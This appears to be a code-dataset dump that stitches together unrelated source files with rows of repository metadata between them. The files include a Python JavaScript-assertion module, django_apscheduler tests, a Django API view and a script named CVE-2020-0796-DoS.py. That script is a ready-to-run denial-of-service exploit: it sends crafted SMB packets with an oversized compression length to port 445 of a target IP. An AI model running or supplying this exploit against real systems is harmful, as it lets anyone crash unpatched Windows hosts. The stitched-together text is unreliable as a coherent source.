- assert_arrays_not_equal
JavaScript assertion interface for Array values not equal condition.
- assert_dicts_equal
JavaScript assertion interface for Dictionary values equal condition.
- assert_dicts_not_equal
JavaScript assertion interface for Dictionary values not equal
condition.
- assert_defined
JavaScript assertion interface for defined (not undefined)
value condition.
- assert_undefined
JavaScript assertion interface for undefined value condition.
"""
from typing import Any
from typing import Tuple
def assert_equal(
left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for equal condition.
Notes
-----
- If specified values are type of Array (or list, etc),
then assert_arrays_equal function will be called instead of
this function.
- If specified value are type of Dictionary (or dict, etc),
then assert_dicts_equal function will be called instead of
this function.
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_equal, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
for value in (left, right):
if _value_type_is_array(value=value):
assert_arrays_equal(left=left, right=right, msg=msg)
return
for value in (left, right):
if _value_type_is_dict(value=value):
assert_dicts_equal(left=left, right=right, msg=msg)
return
_trace_info(
interface_label='assert_equal', left=left, right=right)
left_str, right_str = _get_left_and_right_strs(
left=left, right=right)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert({left_str} === {right_str}, "{msg}");'
)
ap.append_js_expression(expression=expression)
def assert_not_equal(
left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for not equal condition.
Notes
-----
- If specified values are type of Array (or list, etc),
then assert_arrays_not_equal function will be called instead of
this function.
- If specified value are type of Dictionary (or dict, etc),
then assert_dicts_not_equal function will be called instead of
this function.
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_not_equal, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
for value in (left, right):
if _value_type_is_array(value=value):
assert_arrays_not_equal(left=left, right=right, msg=msg)
return
for value in (left, right):
if _value_type_is_dict(value=value):
assert_dicts_not_equal(left=left, right=right, msg=msg)
return
_trace_info(
interface_label='assert_not_equal',
left=left,
right=right)
left_str, right_str = _get_left_and_right_strs(
left=left, right=right)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert({left_str} !== {right_str}, "{msg}");'
)
ap.append_js_expression(expression=expression)
def assert_true(
value: Any, *, type_strict: bool = True, msg: str = '') -> None:
"""
JavaScript assertion interface for true condition.
Parameters
----------
value : *
Target value to check.
type_strict : bool, default True
Whether strictly check actual value or not.
For example, if type_strict is True, interger 1 will
fail, on the contrary (if type_strict is False), integer 1
will pass test.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_true, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
_trace_info(
interface_label='assert_true', left='true', right=value)
_, value_str = _get_left_and_right_strs(
left='_', right=value)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert({value_str} =='
)
expression = _add_equal_if_type_strict_setting_is_true(
expression=expression, type_strict=type_strict)
expression += f' true, "{msg}");'
ap.append_js_expression(expression=expression)
def assert_false(
value: Any, *, type_strict: bool = True, msg: str = '') -> None:
"""
JavaScript assertion interface for false condition.
Parameters
----------
value : *
Target value to check.
type_strict : bool, default True
Whether strictly check actual value or not.
For example, if type_strict is True, interger 0 will
fail, on the contrary (if type_strict is False), integer 0
will pass test.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_false, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
_trace_info(
interface_label='assert_false', left='false', right=value)
_, value_str = _get_left_and_right_strs(
left='_', right=value)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert({value_str} =='
)
expression = _add_equal_if_type_strict_setting_is_true(
expression=expression, type_strict=type_strict)
expression += f' false, "{msg}");'
ap.append_js_expression(expression=expression)
def assert_arrays_equal(
left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for Array values equal condition.
Notes
-----
This is used instead of assert_equal for Array class
comparison (JavaScript can not compare arrays directly, like
a Python, for example, `[1, 2] === [1, 2]` will be false).
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_arrays_equal, locals_=locals(),
module_name=__name__):
_trace_arrays_or_dicts_assertion_info(
interface_label='assert_arrays_equal',
left=left, right=right)
expression: str = _make_arrays_or_dicts_comparison_expression(
left=left, right=right, msg=msg, not_condition=False)
ap.append_js_expression(expression=expression)
def assert_arrays_not_equal(
left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for Array values not equal condition.
Notes
-----
This is used instead of assert_not_equal for Array class
comparison (JavaScript can not compare arrays directly, like
a Python, for example, `[1, 2] === [1, 2]` will be false).
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_arrays_not_equal, locals_=locals(),
module_name=__name__):
_trace_arrays_or_dicts_assertion_info(
interface_label='assert_arrays_not_equal',
left=left, right=right)
expression: str = _make_arrays_or_dicts_comparison_expression(
left=left, right=right, msg=msg, not_condition=True)
ap.append_js_expression(expression=expression)
def assert_dicts_equal(left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for Dictionary values equal
condition.
Notes
-----
This is used instead of assert_equal for Dictionary class
comparison (JavaScript can not compare dictionary (Object)
directly, like a Python, for example, `{"a": 10} === {"a": 10}`
will be false).
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_dicts_equal, locals_=locals(),
module_name=__name__):
_trace_arrays_or_dicts_assertion_info(
interface_label='assert_dicts_equal',
left=left, right=right)
expression: str = _make_arrays_or_dicts_comparison_expression(
left=left, right=right, msg=msg, not_condition=False)
ap.append_js_expression(expression=expression)
def assert_dicts_not_equal(
left: Any, right: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for Dictionary values not equal
condition.
Notes
-----
This is used instead of assert_not_equal for Dictionary class
comparison (JavaScript can not compare dictionary (Object)
directly, like a Python, for example, `{"a": 10} !== {"a": 10}`
will be true).
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_dicts_not_equal, locals_=locals(),
module_name=__name__):
_trace_arrays_or_dicts_assertion_info(
interface_label='assert_dicts_not_equal',
left=left, right=right)
expression: str = _make_arrays_or_dicts_comparison_expression(
left=left, right=right, msg=msg, not_condition=True)
ap.append_js_expression(expression=expression)
def assert_defined(value: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for defined (not undefined)
value condition.
Parameters
----------
value : *
Target value to check.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_defined, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
_trace_info(
interface_label='assert_defined', left='other than undefined',
right=value)
_, value_str = _get_left_and_right_strs(
left='_', right=value)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert(!_.isUndefined({value_str}), "{msg}");'
)
ap.append_js_expression(expression=expression)
def assert_undefined(value: Any, *, msg: str = '') -> None:
"""
JavaScript assertion interface for undefined value condition.
Parameters
----------
value : *
Target value to check.
msg : str, optional
Message to display when assertion failed.
"""
import apysc as ap
with ap.DebugInfo(
callable_=assert_undefined, locals_=locals(),
module_name=__name__):
from apysc._string import string_util
_trace_info(
interface_label='assert_undefined', left='undefined',
right=value)
_, value_str = _get_left_and_right_strs(
left='_', right=value)
msg = string_util.escape_str(string=msg)
expression: str = (
f'console.assert(_.isUndefined({value_str}), "{msg}");'
)
ap.append_js_expression(expression=expression)
def _make_arrays_or_dicts_comparison_expression(
*, left: Any, right: Any, msg: str,
not_condition: bool) -> str:
"""
Make arrays or dicts comparison (assert_arrays_equal,
assert_arrays_not_equal, assert_dicts_equal, or
assert_dicts_not_equal) expression string.
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
msg : str, optional
Message to display when assertion failed.
not_condition : bool
Boolean value whether this expression is not condition
(assert_arrays_not_equal) or not.
Returns
-------
expression : str
Result expression string.
"""
import apysc as ap
with ap.DebugInfo(
callable_=_make_arrays_or_dicts_comparison_expression,
locals_=locals(),
module_name=__name__):
from apysc._string import string_util
from apysc._type import value_util
left_exp_str: str = value_util.get_value_str_for_expression(
value=left)
right_exp_str: str = value_util.get_value_str_for_expression(
value=right)
msg = string_util.escape_str(string=msg)
if not_condition:
not_condition_str: str = '!'
else:
not_condition_str = ''
expression: str = (
f'console.assert({not_condition_str}_.isEqual({left_exp_str}, '
f'{right_exp_str}), "{msg}");'
)
return expression
def _trace_arrays_or_dicts_assertion_info(
*, interface_label: str, left: Any, right: Any) -> None:
"""
Append arrays or dicts value's information trace expression.
Parameters
----------
interface_label : str
Target assertion interface label, e.g., 'assert_arrays_equal'.
left : *
Left-side value to compare.
right : *
Right-side value to compare.
"""
import apysc as ap
with ap.DebugInfo(
callable_=_trace_arrays_or_dicts_assertion_info, locals_=locals(),
module_name=__name__):
from apysc._type import value_util
left_exp_str: str = value_util.get_value_str_for_expression(
value=left)
if isinstance(left, dict):
left_exp_str = left_exp_str.replace('"', '')
right_exp_str: str = value_util.get_value_str_for_expression(
value=right)
if isinstance(right, dict):
right_exp_str = right_exp_str.replace('"', '')
if isinstance(left, (ap.Array, ap.Dictionary)):
value_str: str = value_util.get_value_str_for_expression(
value=left.value)
value_str = value_str.replace('"', '')
left_info_str: str = f'{left_exp_str} ({value_str})'
else:
left_info_str = left_exp_str
right_info_str = right_exp_str
_trace_info(
interface_label=interface_label,
left=left_info_str,
right=right_info_str)
def _value_type_is_array(*, value: Any) -> bool:
"""
Get a boolean value whether the specified value is
Array type or not.
Parameters
----------
value : *
Target value to check.
Returns
-------
result : bool
If the value type is Array, True will be returned.
"""
import apysc as ap
if isinstance(value, ap.Array):
return True
return False
def _value_type_is_dict(*, value: Any) -> bool:
"""
Get a boolean value whether the specified value is
Dictionary type or not.
Parameters
----------
value : *
Target value to check.
Returns
-------
result : bool
If the value type is Dictionary, True will be returned.
"""
from apysc._type.dictionary_structure import DictionaryStructure
if isinstance(value, DictionaryStructure):
return True
return False
def _add_equal_if_type_strict_setting_is_true(
*, expression: str, type_strict: bool) -> str:
"""
Add single equal character to expression if type_string setting
is True.
Parameters
----------
expression : str
Expression to be added.
type_strict: bool
Type strict setting value.
Returns
-------
expression : str
If type_string setting is true, then single equal character
will be added to tail.
"""
if not type_strict:
return expression
expression += '='
return expression
def _get_left_and_right_strs(
*, left: Any, right: Any) -> Tuple[str, str]:
"""
Get left and right value strings from specified values.
Parameters
----------
left : *
Left-side value to compare.
right : *
Right-side value to compare.
Returns
-------
left_str : str
Left-side value's string. If value is string, this will be
wrapped by double quotation.
right_str : str
Right-side value's string. If value is string, this will be
wrapped by double quotation.
"""
from apysc._type import value_util
left_str: str = value_util.get_value_str_for_expression(
value=left)
right_str: str = value_util.get_value_str_for_expression(value=right)
return left_str, right_str
def _trace_info(*, interface_label: str, left: Any, right: Any) -> None:
"""
Append trace expression of specified values.
Parameters
----------
interface_label : str
Target assertion interface label, e.g., 'assert_equal'.
left : *
Left-side value to compare.
right : *
Right-side value to compare.
"""
import apysc as ap
with ap.DebugInfo(
callable_=_trace_info, locals_=locals(),
module_name=__name__):
from apysc._type.variable_name_interface import VariableNameInterface
info: str = f'[{interface_label}]'
if isinstance(left, VariableNameInterface):
info += f'\nLeft-side variable name: {left.variable_name}'
if isinstance(right, VariableNameInterface):
info += f'\nRight-side variable name: {right.variable_name}'
ap.trace(info, '\nLeft value:', left, 'right value:', right)
| 32.404918
| 79
| 0.609248
| 2,269
| 19,767
| 5.047598
| 0.066108
| 0.01886
| 0.048895
| 0.054134
| 0.833843
| 0.817428
| 0.787829
| 0.770279
| 0.751681
| 0.70427
| 0
| 0.001449
| 0.301614
| 19,767
| 609
| 80
| 32.458128
| 0.828178
| 0.360702
| 0
| 0.603922
| 0
| 0
| 0.069761
| 0.028452
| 0
| 0
| 0
| 0
| 0.184314
| 1
| 0.066667
| false
| 0
| 0.109804
| 0
| 0.223529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5495fdd0f647d9922da485a1f10301c1c1883eeb
| 38
|
py
|
Python
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 2
|
2019-12-06T05:18:31.000Z
|
2020-11-07T01:53:51.000Z
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 7
|
2020-04-12T23:18:16.000Z
|
2020-09-30T17:41:09.000Z
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 2
|
2019-12-06T05:18:31.000Z
|
2020-09-29T09:45:03.000Z
|
from alphaorm.AlphaORM import AlphaORM
| 38
| 38
| 0.894737
| 5
| 38
| 6.8
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 38
| 1
| 38
| 38
| 0.971429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49b3a3dcd9c885170d2859f6709bc139ac64a662
| 834
|
py
|
Python
|
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | 2
|
2020-06-06T08:14:32.000Z
|
2021-12-05T20:41:41.000Z
|
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | null | null | null |
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | 2
|
2020-06-10T10:52:29.000Z
|
2021-12-05T20:41:42.000Z
|
import socket, sys
if len(sys.argv) != 2:
sys.exit("Usage: <script>.py <target IP>")
bytes_a = b"\x00\x00\x00\xc6\xfeSMB@"
bytes_b = b'\x00$\x00\x08\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x01\x02\xab\xcd\x01\x02\xab\xcd\x01\x02\xab\xcd\x01\x02\xab\xcdx\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01'
bytes_c = b"\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x02\x00\x03"
smb_connect = bytes_a + b"\x00"*58 + bytes_b + b"\x00"*35 + bytes_c + b"\x00"*9
overflow = b"\x00\x00\x00B\xfcSMB2\x00\x00\x00\x01\x00\x00\x00" + b"\xff"*4 + b"A"*50
s = socket.socket(socket.AF_INET)
s.settimeout(2)
s.connect((sys.argv[1], 445))
s.send(smb_connect)
s.recv(3000)
s.send(overflow)
s.close()
| 37.909091
| 276
| 0.671463
| 177
| 834
| 3.112994
| 0.293785
| 0.381125
| 0.326679
| 0.174229
| 0.299456
| 0.23412
| 0.23412
| 0.08167
| 0.08167
| 0.08167
| 0
| 0.271277
| 0.098321
| 834
| 21
| 277
| 39.714286
| 0.461436
| 0
| 0
| 0
| 0
| 0.2
| 0.573186
| 0.504305
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b721e3a4ed4bdd26e7dde9a0881fd89e06a57b25
| 11,866
|
py
|
Python
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 331
|
2016-07-12T07:03:08.000Z
|
2021-01-26T23:23:36.000Z
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 115
|
2016-07-07T15:23:25.000Z
|
2021-01-21T17:16:10.000Z
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 92
|
2016-11-01T16:10:06.000Z
|
2021-01-25T03:59:58.000Z
|
import warnings
from datetime import datetime
from unittest import mock
import pytest
from apscheduler import events
from apscheduler.events import JobExecutionEvent, JobSubmissionEvent
from django import db
from django.utils import timezone
from django_apscheduler.jobstores import (
DjangoJobStore,
register_job,
register_events,
)
from django_apscheduler.models import DjangoJob, DjangoJobExecution
from tests import conftest
from tests.conftest import DummyScheduler, dummy_job
class TestDjangoResultStoreMixin:
def test_start_gets_scheduler_lock(self):
store = DjangoJobStore()
store.start(DummyScheduler(), "djangojobstore")
assert store.lock is not None
@pytest.mark.django_db
def test_handle_submission_event_not_supported_raises_exception(self, jobstore):
event = JobSubmissionEvent(
events.EVENT_ALL, "test_job", jobstore, [timezone.now()]
)
with pytest.raises(NotImplementedError):
jobstore.handle_submission_event(event)
@pytest.mark.django_db
@pytest.mark.parametrize(
"event_code",
[
events.EVENT_JOB_SUBMITTED,
events.EVENT_JOB_MAX_INSTANCES,
],
)
def test_handle_submission_event_creates_job_execution(
self, event_code, jobstore, create_add_job
):
job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
event = JobSubmissionEvent(event_code, job.id, jobstore, [timezone.now()])
jobstore.handle_submission_event(event)
assert DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db(transaction=True)
def test_handle_submission_event_for_job_that_no_longer_exists_does_not_raise_exception(
self, jobstore
):
event = JobSubmissionEvent(
events.EVENT_JOB_SUBMITTED, "finished_job", jobstore, [timezone.now()]
)
jobstore.handle_submission_event(event)
assert not DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db
def test_handle_execution_event_not_supported_raises_exception(self, jobstore):
event = JobExecutionEvent(
events.EVENT_ALL, "test_job", jobstore, timezone.now()
)
with pytest.raises(NotImplementedError):
jobstore.handle_execution_event(event)
@pytest.mark.django_db
def test_handle_execution_event_creates_job_execution(
self, jobstore, create_add_job
):
job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
event = JobExecutionEvent(
events.EVENT_JOB_EXECUTED, job.id, jobstore, timezone.now()
)
jobstore.handle_execution_event(event)
assert DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db(transaction=True)
def test_handle_execution_event_for_job_that_no_longer_exists_does_not_raise_exception_regression_116(
self, jobstore
):
# Test for regression https://github.com/jcass77/django-apscheduler/issues/116
event = JobExecutionEvent(
events.EVENT_JOB_EXECUTED, "finished_job", jobstore, timezone.now()
)
jobstore.handle_execution_event(event)
assert not DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db
def test_handle_error_event_not_supported_raises_exception(self, jobstore):
event = JobExecutionEvent(
events.EVENT_ALL, "test_job", jobstore, timezone.now()
)
with pytest.raises(NotImplementedError):
jobstore.handle_error_event(event)
@pytest.mark.django_db
@pytest.mark.parametrize(
"event_code",
[
events.EVENT_JOB_MISSED,
events.EVENT_JOB_ERROR,
],
)
def test_handle_error_event_creates_job_execution(
self, jobstore, create_add_job, event_code
):
job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
event = JobExecutionEvent(event_code, job.id, jobstore, timezone.now())
jobstore.handle_error_event(event)
assert DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db
def test_handle_error_event_no_exception_sets_exception_text(
self, jobstore, create_add_job
):
job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
event = JobExecutionEvent(
events.EVENT_JOB_ERROR, job.id, jobstore, timezone.now()
)
jobstore.handle_error_event(event)
ex = DjangoJobExecution.objects.get(job_id=event.job_id)
assert "raised an error!" in ex.exception
@pytest.mark.django_db(transaction=True)
def test_handle_error_event_for_job_that_no_longer_exists_does_not_raise_exception(
self, jobstore
):
event = JobExecutionEvent(
events.EVENT_JOB_ERROR, "finished_job", jobstore, timezone.now()
)
jobstore.handle_error_event(event)
assert not DjangoJobExecution.objects.filter(job_id=event.job_id).exists()
@pytest.mark.django_db
def test_register_event_listeners_registers_listeners(self, jobstore):
jobstore.register_event_listeners()
registered_event_codes = [event[1] for event in jobstore._scheduler._listeners]
assert all(
event_code in registered_event_codes
for event_code in [
events.EVENT_JOB_SUBMITTED | events.EVENT_JOB_MAX_INSTANCES,
events.EVENT_JOB_EXECUTED,
events.EVENT_JOB_ERROR | events.EVENT_JOB_MISSED,
]
)
class TestDjangoJobStore:
"""
We use the APScheduler tests to verify that DjangoJobStore implements the interface correctly.
This test class should only contain tests that are specific to DjangoJobStore
See 'test_apscheduler_jobstore.py' for details
"""
@pytest.mark.django_db(transaction=True)
def test_lookup_job_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.get",
side_effect=conftest.raise_db_operational_error,
):
jobstore.lookup_job("some job")
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_get_due_jobs_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.filter",
side_effect=conftest.raise_db_operational_error,
):
jobstore.get_due_jobs(datetime(2016, 5, 3))
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_get_next_run_time_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.filter",
side_effect=conftest.raise_db_operational_error,
):
jobstore.get_next_run_time()
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_add_job_does_retry_on_db_operational_error(self, jobstore, create_job):
job = create_job(
func=dummy_job,
trigger="date",
trigger_args={"run_date": datetime(2016, 5, 3)},
id="test",
)
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.create",
side_effect=conftest.raise_db_operational_error,
):
jobstore.add_job(job)
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_update_job_does_retry_on_db_operational_error(self, jobstore, create_job):
job = create_job(
func=dummy_job,
trigger="date",
trigger_args={"run_date": datetime(2016, 5, 3)},
id="test",
)
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.get",
side_effect=conftest.raise_db_operational_error,
):
jobstore.update_job(job)
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_remove_job_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.get",
side_effect=conftest.raise_db_operational_error,
):
jobstore.remove_job("some job")
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_remove_all_jobs_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.all",
side_effect=conftest.raise_db_operational_error,
):
jobstore.remove_all_jobs()
assert close_mock.call_count == 1
@pytest.mark.django_db(transaction=True)
def test_get_jobs_does_retry_on_db_operational_error(self, jobstore):
with mock.patch.object(db.connection, "close") as close_mock:
with pytest.raises(db.OperationalError, match="Some DB-related error"):
with mock.patch(
"django_apscheduler.jobstores.DjangoJob.objects.filter",
side_effect=conftest.raise_db_operational_error,
):
jobstore._get_jobs()
assert close_mock.call_count == 1
@pytest.mark.django_db
def test_register_events_raises_deprecation_warning(scheduler, jobstore):
with warnings.catch_warnings(record=True) as w:
register_events(scheduler, jobstore)
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert "deprecated" in str(w[-1].message)
@pytest.mark.django_db
def test_register_job(scheduler, jobstore):
register_job(scheduler, "interval", seconds=1)(dummy_job)
scheduler.start()
assert DjangoJob.objects.count() == 1
@pytest.mark.django_db
def test_register_job_raises_deprecation_warning(scheduler, jobstore):
with warnings.catch_warnings(record=True) as w:
register_job(scheduler, "interval", seconds=1)(dummy_job)
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert "deprecated" in str(w[-1].message)
| 38.032051
| 106
| 0.666358
| 1,366
| 11,866
| 5.489019
| 0.116398
| 0.032009
| 0.046946
| 0.052814
| 0.807682
| 0.788744
| 0.778741
| 0.758469
| 0.724193
| 0.644572
| 0
| 0.007628
| 0.248694
| 11,866
| 311
| 107
| 38.154341
| 0.833427
| 0.025198
| 0
| 0.602459
| 0
| 0
| 0.070519
| 0.035693
| 0
| 0
| 0
| 0
| 0.098361
| 1
| 0.094262
| false
| 0
| 0.04918
| 0
| 0.151639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f818ff851bf166cd809361e7114d1dff6eaefec
| 151
|
py
|
Python
|
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
number = 2
number = number * number * number
print (number * number * number)
print ("!@#$%^&*()-=") # testing character matching
| 18.875
| 51
| 0.635762
| 17
| 151
| 5.647059
| 0.529412
| 0.625
| 0.5625
| 0.479167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.165563
| 151
| 7
| 52
| 21.571429
| 0.746032
| 0.291391
| 0
| 0
| 0
| 0
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
b7a0a1f109c3984f603312d7647beb6d6a210b10
| 14,518
|
py
|
Python
|
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
from rest_framework import generics
from api import *
from serializers import OrganizationSerializer, OrganizationStudentSerializer, OrganizationGradeSerializer, OrganizationCertificateSerializer
from rest_framework.permissions import IsAdminUser
from django.http import Http404
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from oauth2_provider.ext.rest_framework.authentication import OAuth2Authentication
# Create your views here.
class OrganizationList(generics.ListAPIView):
"""
**Use Case**
*Get a paginated list of organizations with all its courses in the edX Platform.
Each page in the list can contain up to 10 courses.
**Example Requests**
GET /api/organizations/v1/summary/
**Response Values**
On success with Response Code <200>
* count: The number of courses in the edX platform.
* next: The URI to the next page of courses.
* previous: The URI to the previous page of courses.
* num_pages: The number of pages listing courses.
* results: A list of courses returned. Each collection in the list
contains these fields.
* organization: The name of the organization.
* courses:
* id: The unique identifier for the course.
* display_name: The display name of the course.
* start: The course start date.
* end: The course end date. If course end date is not specified, the
value is null.
